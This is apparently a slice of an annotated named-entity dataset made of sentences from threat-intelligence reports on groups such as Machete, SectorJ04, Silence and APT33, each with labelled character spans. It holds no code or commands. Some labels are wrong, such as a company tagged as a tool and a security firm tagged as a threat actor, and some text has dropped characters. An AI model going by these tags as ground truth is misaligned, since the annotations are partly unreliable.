{"text": "ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations .", "spans": {"ORGANIZATION: ESET": [[0, 4]]}, "info": {"id": "dnrti_train_003228", "source": "dnrti_train"}}
{"text": "The group behind Machete uses effective spearphishing techniques .", "spans": {"THREAT_ACTOR: Machete": [[17, 24]]}, "info": {"id": "dnrti_train_003229", "source": "dnrti_train"}}
{"text": "First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries .", "spans": {"ORGANIZATION: Kaspersky": [[19, 28]], "ORGANIZATION: Cylance": [[56, 63]], "THREAT_ACTOR: Machete": [[78, 85]]}, "info": {"id": "dnrti_train_003230", "source": "dnrti_train"}}
{"text": "In 2018 Machete reappeared with new code and new features .", "spans": {"THREAT_ACTOR: Machete": [[8, 15]]}, "info": {"id": "dnrti_train_003231", "source": "dnrti_train"}}
{"text": "As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces .", "spans": {"ORGANIZATION: ESET": [[18, 22]], "THREAT_ACTOR: Machete": [[77, 84]]}, "info": {"id": "dnrti_train_003232", "source": "dnrti_train"}}
{"text": "Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]], "THREAT_ACTOR: group": [[80, 85]]}, "info": {"id": "dnrti_train_003233", "source": "dnrti_train"}}
{"text": "Machete was active and constantly working on very effective spearphishing campaigns .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]]}, "info": {"id": "dnrti_train_003234", "source": "dnrti_train"}}
{"text": "In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day .", "spans": {"THREAT_ACTOR: Machete": [[16, 23]]}, "info": {"id": "dnrti_train_003235", "source": "dnrti_train"}}
{"text": "Machete relies on spearphishing to compromise its targets .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]]}, "info": {"id": "dnrti_train_003236", "source": "dnrti_train"}}
{"text": "Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "dnrti_train_003238", "source": "dnrti_train"}}
{"text": "Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised .", "spans": {"THREAT_ACTOR: Machete": [[17, 24]]}, "info": {"id": "dnrti_train_003239", "source": "dnrti_train"}}
{"text": "Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server .", "spans": {"ORGANIZATION: ESET": [[54, 58]]}, "info": {"id": "dnrti_train_003240", "source": "dnrti_train"}}
{"text": "This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete .", "spans": {"THREAT_ACTOR: Machete": [[126, 133]]}, "info": {"id": "dnrti_train_003241", "source": "dnrti_train"}}
{"text": "Machete is malware that has been developed and is actively maintained by a Spanish-speaking group .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]]}, "info": {"id": "dnrti_train_003242", "source": "dnrti_train"}}
{"text": "Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years .", "spans": {"ORGANIZATION: organizations": [[139, 152]]}, "info": {"id": "dnrti_train_003243", "source": "dnrti_train"}}
{"text": "By introducing small changes to their code and infrastructure , the group has bypassed several security products .", "spans": {"THREAT_ACTOR: group": [[68, 73]]}, "info": {"id": "dnrti_train_003244", "source": "dnrti_train"}}
{"text": "OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]]}, "info": {"id": "dnrti_train_003245", "source": "dnrti_train"}}
{"text": "It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks .", "spans": {"THREAT_ACTOR: HackingTeam": [[60, 71]]}, "info": {"id": "dnrti_train_003247", "source": "dnrti_train"}}
{"text": "This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking .", "spans": {"ORGANIZATION: report": [[5, 11]], "THREAT_ACTOR: SectorJ04": [[73, 82], [209, 218]]}, "info": {"id": "dnrti_train_003248", "source": "dnrti_train"}}
{"text": "In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims .", "spans": {"THREAT_ACTOR: SectorJ04": [[14, 23]]}, "info": {"id": "dnrti_train_003249", "source": "dnrti_train"}}
{"text": "The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003250", "source": "dnrti_train"}}
{"text": "There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea .", "spans": {"THREAT_ACTOR: SectorJ04's": [[36, 47]]}, "info": {"id": "dnrti_train_003251", "source": "dnrti_train"}}
{"text": "They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server .", "spans": {"THREAT_ACTOR: attacker’s": [[126, 136]]}, "info": {"id": "dnrti_train_003252", "source": "dnrti_train"}}
{"text": "We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India .", "spans": {"THREAT_ACTOR: SectorJ04": [[7, 16]]}, "info": {"id": "dnrti_train_003253", "source": "dnrti_train"}}
{"text": "The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their areas of activity to include the medical , pharmaceutical , media , energy and manufacturing industries .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003255", "source": "dnrti_train"}}
{"text": "The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]], "TOOL: ServHelper": [[53, 63]], "TOOL: FlawedAmmy RAT": [[68, 82]]}, "info": {"id": "dnrti_train_003256", "source": "dnrti_train"}}
{"text": "SectorJ04 also used the Remote Manipulator System (RMS) RAT , a legitimate remote management software created in Russia .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]], "TOOL: Remote Manipulator System": [[24, 49]]}, "info": {"id": "dnrti_train_003257", "source": "dnrti_train"}}
{"text": "Backdoors are installed in infected systems and SectorJ04 also distributed email stealers , botnet malware and ransomware through those backdoors .", "spans": {"THREAT_ACTOR: SectorJ04": [[48, 57]], "TOOL: backdoors": [[136, 145]]}, "info": {"id": "dnrti_train_003258", "source": "dnrti_train"}}
{"text": "SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker’s server .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]], "TOOL: AdroMut": [[67, 74]], "TOOL: FlowerPippi": [[79, 90]], "THREAT_ACTOR: attacker’s": [[236, 246]]}, "info": {"id": "dnrti_train_003260", "source": "dnrti_train"}}
{"text": "Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia .", "spans": {"THREAT_ACTOR: SectorJ04": [[13, 22]]}, "info": {"id": "dnrti_train_003261", "source": "dnrti_train"}}
{"text": "A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 .", "spans": {"TOOL: AdroMut": [[30, 37]], "TOOL: FlowerPippi": [[63, 74]], "THREAT_ACTOR: SectorJ04": [[102, 111]]}, "info": {"id": "dnrti_train_003263", "source": "dnrti_train"}}
{"text": "But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email .", "spans": {"THREAT_ACTOR: SectorJ04": [[15, 24]]}, "info": {"id": "dnrti_train_003264", "source": "dnrti_train"}}
{"text": "The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered .", "spans": {"THREAT_ACTOR: SectorJ04": [[26, 35]]}, "info": {"id": "dnrti_train_003265", "source": "dnrti_train"}}
{"text": "Prior to 2019 , the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware , such as Locky and GlobeImporter , along with its banking Trojan , on its victims computers .", "spans": {"THREAT_ACTOR: SectorJ04": [[20, 29]], "TOOL: exploit kits": [[102, 114]], "TOOL: Locky": [[159, 164]], "TOOL: GlobeImporter": [[169, 182]], "TOOL: banking Trojan": [[200, 214]]}, "info": {"id": "dnrti_train_003266", "source": "dnrti_train"}}
{"text": "In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards .", "spans": {"THREAT_ACTOR: SectorJ04's": [[26, 37]]}, "info": {"id": "dnrti_train_003267", "source": "dnrti_train"}}
{"text": "The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003268", "source": "dnrti_train"}}
{"text": "In June , SectorJ04 group conducted hacking using spam emails written in various languages , including English , Arabic , Korean and Italian , and the emails were written with various contents , including remittance card , invoice and tax invoice .", "spans": {"THREAT_ACTOR: SectorJ04": [[10, 19]]}, "info": {"id": "dnrti_train_003269", "source": "dnrti_train"}}
{"text": "Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing .", "spans": {"THREAT_ACTOR: SectorJ04": [[75, 84]]}, "info": {"id": "dnrti_train_003270", "source": "dnrti_train"}}
{"text": "In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi .", "spans": {"TOOL: ServHelper": [[41, 51]], "TOOL: FlawedAmmy": [[56, 66]], "TOOL: AdroMut": [[126, 133]], "TOOL: FlowerPippi": [[138, 149]]}, "info": {"id": "dnrti_train_003271", "source": "dnrti_train"}}
{"text": "AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor .", "spans": {"TOOL: ServHelper": [[30, 40]], "TOOL: FlawedAmmy": [[45, 55]], "THREAT_ACTOR: SectorJ04": [[72, 81]]}, "info": {"id": "dnrti_train_003272", "source": "dnrti_train"}}
{"text": "The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003273", "source": "dnrti_train"}}
{"text": "Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[13, 22]], "TOOL: ransomware": [[106, 116]], "TOOL: banking trojans": [[121, 136]]}, "info": {"id": "dnrti_train_003274", "source": "dnrti_train"}}
{"text": "The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003275", "source": "dnrti_train"}}
{"text": "This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[116, 125]], "ORGANIZATION: companies": [[287, 296]]}, "info": {"id": "dnrti_train_003276", "source": "dnrti_train"}}
{"text": "SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea’s media , manufacturing and universities , around February and March 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]]}, "info": {"id": "dnrti_train_003277", "source": "dnrti_train"}}
{"text": "SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]]}, "info": {"id": "dnrti_train_003279", "source": "dnrti_train"}}
{"text": "SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]]}, "info": {"id": "dnrti_train_003280", "source": "dnrti_train"}}
{"text": "In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea .", "spans": {"THREAT_ACTOR: SectorJ04": [[15, 24]]}, "info": {"id": "dnrti_train_003281", "source": "dnrti_train"}}
{"text": "In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong .", "spans": {"THREAT_ACTOR: SectorJ04": [[22, 31]]}, "info": {"id": "dnrti_train_003282", "source": "dnrti_train"}}
{"text": "Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity .", "spans": {}, "info": {"id": "dnrti_train_003283", "source": "dnrti_train"}}
{"text": "They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities .", "spans": {"THREAT_ACTOR: groups": [[44, 50]]}, "info": {"id": "dnrti_train_003284", "source": "dnrti_train"}}
{"text": "Now , Silence is one of the most active threat actors targeting the financial sector .", "spans": {"THREAT_ACTOR: Silence": [[6, 13]]}, "info": {"id": "dnrti_train_003285", "source": "dnrti_train"}}
{"text": "Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report .", "spans": {"THREAT_ACTOR: Silence:": [[40, 48]], "ORGANIZATION: Group-IB's": [[173, 183]]}, "info": {"id": "dnrti_train_003286", "source": "dnrti_train"}}
{"text": "Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003287", "source": "dnrti_train"}}
{"text": "Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]], "TOOL: Ivoke": [[27, 32]], "TOOL: EDA agent": [[59, 68]]}, "info": {"id": "dnrti_train_003288", "source": "dnrti_train"}}
{"text": "Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence’s activity .", "spans": {"ORGANIZATION: Going Global": [[13, 25]], "THREAT_ACTOR: group": [[171, 176]], "THREAT_ACTOR: Silence’s activity": [[216, 234]]}, "info": {"id": "dnrti_train_003289", "source": "dnrti_train"}}
{"text": "Since the report’s release in September 2018 , Group-IB’s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence .", "spans": {"ORGANIZATION: Group-IB’s": [[47, 57]], "ORGANIZATION: banks": [[119, 124]], "THREAT_ACTOR: Silence": [[137, 144]]}, "info": {"id": "dnrti_train_003290", "source": "dnrti_train"}}
{"text": "Like the majority of APT groups , Silence uses phishing as their infection vector .", "spans": {"THREAT_ACTOR: Silence": [[34, 41]]}, "info": {"id": "dnrti_train_003291", "source": "dnrti_train"}}
{"text": "In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night .", "spans": {"THREAT_ACTOR: hackers": [[102, 109]]}, "info": {"id": "dnrti_train_003292", "source": "dnrti_train"}}
{"text": "Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan .", "spans": {"THREAT_ACTOR: Group-IB’s": [[38, 48]]}, "info": {"id": "dnrti_train_003293", "source": "dnrti_train"}}
{"text": "In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography .", "spans": {"THREAT_ACTOR: Silence": [[10, 17]]}, "info": {"id": "dnrti_train_003294", "source": "dnrti_train"}}
{"text": "Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003296", "source": "dnrti_train"}}
{"text": "Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe .", "spans": {"THREAT_ACTOR: Silence": [[31, 38]]}, "info": {"id": "dnrti_train_003298", "source": "dnrti_train"}}
{"text": "In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history .", "spans": {"THREAT_ACTOR: Silence": [[19, 26]]}, "info": {"id": "dnrti_train_003299", "source": "dnrti_train"}}
{"text": "In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea .", "spans": {"THREAT_ACTOR: Silence": [[11, 18]]}, "info": {"id": "dnrti_train_003300", "source": "dnrti_train"}}
{"text": "From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database .", "spans": {"THREAT_ACTOR: Silence": [[41, 48]]}, "info": {"id": "dnrti_train_003302", "source": "dnrti_train"}}
{"text": "As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .LNK shortcuts as malicious attachments .", "spans": {"THREAT_ACTOR: silence": [[38, 45]]}, "info": {"id": "dnrti_train_003303", "source": "dnrti_train"}}
{"text": "In the former Soviet Union , Silence targeted banks in Kyrgyzstan , Kazakhstan , and Ukraine .", "spans": {"THREAT_ACTOR: Silence": [[29, 36]]}, "info": {"id": "dnrti_train_003304", "source": "dnrti_train"}}
{"text": "As the CnC server , Silence use CnC-3 server running Windows , from which they send commands to download additional modules .", "spans": {"THREAT_ACTOR: Silence": [[20, 27]], "TOOL: CnC-3 server": [[32, 44]]}, "info": {"id": "dnrti_train_003307", "source": "dnrti_train"}}
{"text": "To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe .", "spans": {"THREAT_ACTOR: group": [[22, 27]], "TOOL: Atmosphere Trojan": [[37, 54]], "THREAT_ACTOR: Silence": [[76, 83]], "TOOL: xfs-disp.exe": [[106, 118]]}, "info": {"id": "dnrti_train_003308", "source": "dnrti_train"}}
{"text": "In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and Silence. ProxyBot.NET , which are described in detail in the report Silence: moving into the darkside .", "spans": {"THREAT_ACTOR: Silence": [[14, 21]], "TOOL: Silence.ProxyBot": [[59, 75]], "TOOL: Silence. ProxyBot.NET": [[80, 101]]}, "info": {"id": "dnrti_train_003309", "source": "dnrti_train"}}
{"text": "Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": {"VULNERABILITY: exploit": [[65, 72]], "VULNERABILITY: CVE-2017-11882 vulnerability": [[81, 109]]}, "info": {"id": "dnrti_train_003310", "source": "dnrti_train"}}
{"text": "Silence sent out emails to Russian banks .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003312", "source": "dnrti_train"}}
{"text": "Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003314", "source": "dnrti_train"}}
{"text": "Silence attacked financial organisations in the UK .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003316", "source": "dnrti_train"}}
{"text": "Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003317", "source": "dnrti_train"}}
{"text": "The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_003318", "source": "dnrti_train"}}
{"text": "On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign .", "spans": {"THREAT_ACTOR: group": [[29, 34]]}, "info": {"id": "dnrti_train_003320", "source": "dnrti_train"}}
{"text": "Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]]}, "info": {"id": "dnrti_train_003321", "source": "dnrti_train"}}
{"text": "According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months .", "spans": {"THREAT_ACTOR: Silence": [[43, 50]]}, "info": {"id": "dnrti_train_003322", "source": "dnrti_train"}}
{"text": "As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems .", "spans": {"THREAT_ACTOR: Silence:": [[19, 27]], "THREAT_ACTOR: Silence": [[62, 69]]}, "info": {"id": "dnrti_train_003324", "source": "dnrti_train"}}
{"text": "In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk .", "spans": {}, "info": {"id": "dnrti_train_003325", "source": "dnrti_train"}}
{"text": "On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 (see section ‘Attack timeline’) .", "spans": {"THREAT_ACTOR: Silence": [[21, 28]]}, "info": {"id": "dnrti_train_003326", "source": "dnrti_train"}}
{"text": "Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "ORGANIZATION: employees": [[68, 77]]}, "info": {"id": "dnrti_train_003327", "source": "dnrti_train"}}
{"text": "Since at least 2011 , these hackers have been using malware to spy on corporate networks .", "spans": {"THREAT_ACTOR: hackers": [[28, 35]], "TOOL: malware": [[52, 59]]}, "info": {"id": "dnrti_train_003330", "source": "dnrti_train"}}
{"text": "Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies .", "spans": {"THREAT_ACTOR: Hackers": [[0, 7]]}, "info": {"id": "dnrti_train_003331", "source": "dnrti_train"}}
{"text": "The corporation conrms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions.” Henkel claims that a very small portion” of its worldwide IT systems had been aected — the systems in Germany .", "spans": {"THREAT_ACTOR: Winnti": [[27, 33]]}, "info": {"id": "dnrti_train_003333", "source": "dnrti_train"}}
{"text": "A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the rst levels” of defense .", "spans": {"THREAT_ACTOR: hackers": [[60, 67]]}, "info": {"id": "dnrti_train_003334", "source": "dnrti_train"}}
{"text": "The tool was written by sta of Thyssenkrupp , because the industrial giant—company number eleven—had been spied on by Winnti .", "spans": {"TOOL: Thyssenkrupp": [[31, 43]], "THREAT_ACTOR: Winnti": [[118, 124]]}, "info": {"id": "dnrti_train_003335", "source": "dnrti_train"}}
{"text": "Hackers are charged with spying on a manufacturer of gas turbines .", "spans": {"THREAT_ACTOR: Hackers": [[0, 7]]}, "info": {"id": "dnrti_train_003336", "source": "dnrti_train"}}
{"text": "The Hong Kong government was spied on by the Winnti hackers .", "spans": {"THREAT_ACTOR: Winnti": [[45, 51]]}, "info": {"id": "dnrti_train_003337", "source": "dnrti_train"}}
{"text": "Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX .", "spans": {"TOOL: Komplex": [[0, 7]], "THREAT_ACTOR: APT28": [[44, 49]]}, "info": {"id": "dnrti_train_003338", "source": "dnrti_train"}}
{"text": "While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": {"THREAT_ACTOR: OceanLotus’": [[6, 17]], "ORGANIZATION: activists": [[192, 201]], "ORGANIZATION: dissidents": [[208, 218]]}, "info": {"id": "dnrti_train_003339", "source": "dnrti_train"}}
{"text": "NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue .", "spans": {"THREAT_ACTOR: NewsBeef": [[0, 8]]}, "info": {"id": "dnrti_train_003340", "source": "dnrti_train"}}
{"text": "Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "THREAT_ACTOR: APT10": [[97, 102]]}, "info": {"id": "dnrti_train_003341", "source": "dnrti_train"}}
{"text": "These RAT families are discussed in Novetta’s other report on the Lazarus Group’s RAT and Staging capabilities .", "spans": {"ORGANIZATION: Novetta’s": [[36, 45]], "THREAT_ACTOR: Lazarus": [[66, 73]]}, "info": {"id": "dnrti_train_003343", "source": "dnrti_train"}}
{"text": "\bMagic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia .", "spans": {"THREAT_ACTOR: \bMagic Hound": [[0, 12]]}, "info": {"id": "dnrti_train_003344", "source": "dnrti_train"}}
{"text": "\bSince at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": {"THREAT_ACTOR: group": [[42, 47]], "ORGANIZATION: FireEye": [[53, 60]], "THREAT_ACTOR: APT33": [[71, 76]]}, "info": {"id": "dnrti_train_003345", "source": "dnrti_train"}}
{"text": "\bCTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash .", "spans": {"ORGANIZATION: \bCTU": [[0, 4]], "THREAT_ACTOR: Mia Ash": [[179, 186]]}, "info": {"id": "dnrti_train_003346", "source": "dnrti_train"}}
{"text": "\bCTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering .", "spans": {"ORGANIZATION: \bCTU": [[0, 4]], "THREAT_ACTOR: COBALT GYPSY": [[31, 43]]}, "info": {"id": "dnrti_train_003347", "source": "dnrti_train"}}
{"text": "\bCharacterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East (including targets inside Iran itself) , as well as across Europe and in the United States .", "spans": {"THREAT_ACTOR: Magic Hound": [[103, 114]]}, "info": {"id": "dnrti_train_003348", "source": "dnrti_train"}}
{"text": "The activity surfaced in Southeast Asia , a region where APT10 frequently operates .", "spans": {"THREAT_ACTOR: APT10": [[57, 62]]}, "info": {"id": "dnrti_train_003350", "source": "dnrti_train"}}
{"text": "APT10 frequently targets the Southeast Asia region .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_003352", "source": "dnrti_train"}}
{"text": "Both of the loader’s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures (TTPs) and code associated with APT10 .", "spans": {"ORGANIZATION: enSilo": [[62, 68]], "THREAT_ACTOR: APT10": [[162, 167]]}, "info": {"id": "dnrti_train_003353", "source": "dnrti_train"}}
{"text": "Over the past three months , Recorded Future’s Insikt Group has observed an increase in APT33’s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo .", "spans": {"ORGANIZATION: Recorded Future’s": [[29, 46]], "THREAT_ACTOR: APT33’s": [[88, 95]], "THREAT_ACTOR: Elfin": [[110, 115]]}, "info": {"id": "dnrti_train_003356", "source": "dnrti_train"}}
{"text": "News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group .", "spans": {"ORGANIZATION: U.S. Cyber": [[23, 33]], "THREAT_ACTOR: group": [[82, 87]]}, "info": {"id": "dnrti_train_003357", "source": "dnrti_train"}}
{"text": "Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors .", "spans": {"THREAT_ACTOR: APT33": [[37, 42]]}, "info": {"id": "dnrti_train_003358", "source": "dnrti_train"}}
{"text": "Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware .", "spans": {"THREAT_ACTOR: APT33": [[24, 29]]}, "info": {"id": "dnrti_train_003359", "source": "dnrti_train"}}
{"text": "The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous exposés of their activity .", "spans": {"THREAT_ACTOR: group": [[138, 143]]}, "info": {"id": "dnrti_train_003360", "source": "dnrti_train"}}
{"text": "Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese cyber espionage group .", "spans": {"THREAT_ACTOR: APT10": [[86, 91]], "THREAT_ACTOR: group": [[120, 125]]}, "info": {"id": "dnrti_train_003361", "source": "dnrti_train"}}
{"text": "Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity .", "spans": {"THREAT_ACTOR: APT33": [[28, 33], [150, 155]], "TOOL: njRAT": [[94, 99]]}, "info": {"id": "dnrti_train_003362", "source": "dnrti_train"}}
{"text": "Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity .", "spans": {"TOOL: AdwindRAT": [[47, 56]], "TOOL: RevengeRAT": [[61, 71]], "THREAT_ACTOR: APT33": [[104, 109]]}, "info": {"id": "dnrti_train_003363", "source": "dnrti_train"}}
{"text": "APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_003364", "source": "dnrti_train"}}
